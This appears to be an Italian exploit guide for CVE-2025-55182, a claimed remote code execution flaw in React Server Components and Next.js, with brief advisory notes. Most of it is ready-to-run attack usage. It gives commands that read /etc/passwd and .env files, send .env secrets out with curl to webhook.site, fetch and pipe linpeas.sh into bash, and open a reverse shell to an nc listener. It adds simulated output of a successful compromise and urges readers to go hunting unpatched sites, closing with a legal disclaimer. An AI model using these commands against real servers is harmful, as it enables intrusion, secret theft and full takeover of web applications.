CVE-2025-55182
✅ Ciò significa che gli attaccanti potrebbero potenzialmente eseguire codice lato server arbitrario con una singola richiesta costruita ad arte.
⚠️ Sistemi che utilizzano React Server Components, inclusi:
✅ Pacchetti DOM del server React
✅ Framework che includono RSC, come:
❌ Non colpiti:
🔍 Scansiona per pacchetti vulnerabili transitivi
🧾 Usa:
npm auditpnpm audityarn audit⚠️ Questi riducono solo il rischio — NON sostituiscono la correzione
✅ Sviluppatori full-stack che usano Next.js App Router
✅ Team DevOps che ospitano app React SSR
✅ Ingegneri della sicurezza che monitorano:
🚨 Se la tua app utilizza React Server Components e non è corretta — è potenzialmente completamente compromessa in questo momento.
CVE-2025-55182.py (basic RCE)
# Basic info
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"
# Read files
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"
# Exfiltrate
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
# Download & run (if wget/curl exists)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
CVE-2025-55182-revshell.py (instant reverse shell)
# 1. Start listener (once)
nc -lvnp 4444
# 2. Fire → shell in <3 seconds
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Letteralmente.
Due script, questi 8 comandi → compromissione totale su qualsiasi sito Next.js non corretto oggi.
Vai a prenderti quelle taglie.
Ecco esattamente cosa vedrai in tempo reale quando l'exploit funziona (target non corretto al 100%, 3 Dicembre 2025):
1. Quando esegui lo script RCE normale (CVE-2025-55182.py)
Digiti:
./CVE-2025-55182.py https://target.com "whoami"
Vedi immediatamente sullo schermo:
[+] CVE-2025-55182 Exploit
[+] Target : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node
→ Quel “node” (o qualunque output del comando) è l'output effettivo dal server vittima.
Se esegui id vedrai le righe complete uid/gid, ecc.
2. Quando esegui lo script reverse-shell (CVE-2025-55182-revshell.py)
Digiti:
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Vedi immediatamente sul terminale del listener:
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node 4096 Dec 3 12:34 .
drwxr-xr-x 1 root root 4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node 420 Dec 3 11:11 .env
...
→ Shell TTY interattiva completa come utente node (quasi sempre l'utente dell'app web). Sei in controllo della macchina.
Letteralmente.
Se vedi uno dei precedenti → exploit funzionato al 100%.
Se ricevi solo HTTP 403/404 o nulla → già corretto o bloccato dal WAF.
Vai a caccia.
Avviso legale
Questa PoC è solo per test di sicurezza autorizzati e uso educativo.
Non eseguirla contro alcun sistema che non possiedi o per cui non hai esplicita autorizzazione scritta per testare.
L'uso non autorizzato è illegale e può portare a procedimenti penali.
Usala solo nel tuo laboratorio, in programmi bug-bounty con ambito chiaro, o su target che ti hanno dato il permesso.
Sei responsabile al 100% delle tue azioni.